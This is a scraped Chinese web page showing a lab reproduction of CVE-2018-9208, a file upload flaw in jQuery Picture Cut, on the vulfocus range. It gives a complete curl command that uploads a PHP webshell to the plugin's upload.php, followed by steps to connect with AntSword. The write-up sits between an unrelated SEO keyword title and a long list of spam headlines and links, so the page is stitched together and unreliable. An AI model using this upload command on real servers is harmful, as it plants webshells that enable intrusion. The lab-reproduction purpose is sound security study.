当前位置: 首页 > news >正文

做毕业设计的网站设计网站框架优化

做毕业设计的网站设计,网站框架优化,wordpress 汉化 不变,微商城平台开发jquery-picture-cut 任意文件上传_(CVE-2018-9208) 漏洞信息 jQuery Picture Cut v1.1以下版本中存在安全漏洞CVE-2018-9208文件上传漏洞 描述 ​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap…

jquery-picture-cut 任意文件上传_(CVE-2018-9208)

漏洞信息

  • jQuery Picture Cut v1.1以下版本中存在安全漏洞
  • CVE-2018-9208
  • 文件上传漏洞

描述

​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

访问首页

image-20231027115056615

使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置

jquery-picture-cut/src/php/upload.php
curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@yijuhua.php" http://10.9.47.6:56174//jquery-picture-cut/src/php/upload.php

image-20231027115508665

使用中国蚁剑连接

http://10.9.47.6:56174/yijuhua.php

image-20231027115602804

获取flag

image-20231027115638391

http://www.yayakq.cn/news/903760/

相关文章:

  • 做网站需要电脑吗四川seo
  • 给客户做网站怎样制作免费网页
  • 建立网站的基本流程有哪些步骤wordpress 文字围绕图片
  • 网站建设基础考试百度指数是怎么计算的
  • php+网站开发案例教程网站手机版开发
  • 免费做网站平台推广网站弄哪家好
  • 唐山长城网站建设国家军事网
  • vps怎么上传网站程序搜索引擎都有哪些
  • 购物网站开发一般使用什么语言网站底部链接代码
  • 侨联网站建设seo策略推广什么意思
  • 用照片做的ppt模板下载网站网站开发排期表模板
  • html5网站单页模板网站诊断seo当前数据是指
  • 如何做淘宝网网站域名模板网字库
  • 做软件赚钱还是做网站赚钱友情链接网站源码
  • 办网站怎么办创新的沈阳网站建设
  • 免费网站空间申请哪个好武义县网站制作
  • 重庆夹夹虫网络公司网站建设商务网站建设实训总结
  • 单页网站开发实例下载青岛做个网站多少钱
  • 没有ipc备案的网站金融企业网站制作
  • 厦门营销网站建设wap网站开发工具
  • 建筑工程网站建设怎么样做淘宝联盟网站
  • 腾讯云怎么做网站wordpress 用户权限插件
  • 对网站建设展望推广之家
  • 专业网站制作网站公司南京网站建设网站制作
  • 安徽长江建设集团有限公司网站网站关键词分割
  • 作图网站都有哪些云南省建设厅网站怎么进不去
  • 怎么打帮人 做网站开发的广告wordpress关闭更新
  • 网站系统怎么用wordpress用户角色的区别
  • 做网站建本地环境作用沈阳旅游团购网站建设
  • asp.net门户网站项目怎么做一个网站可以做几级链接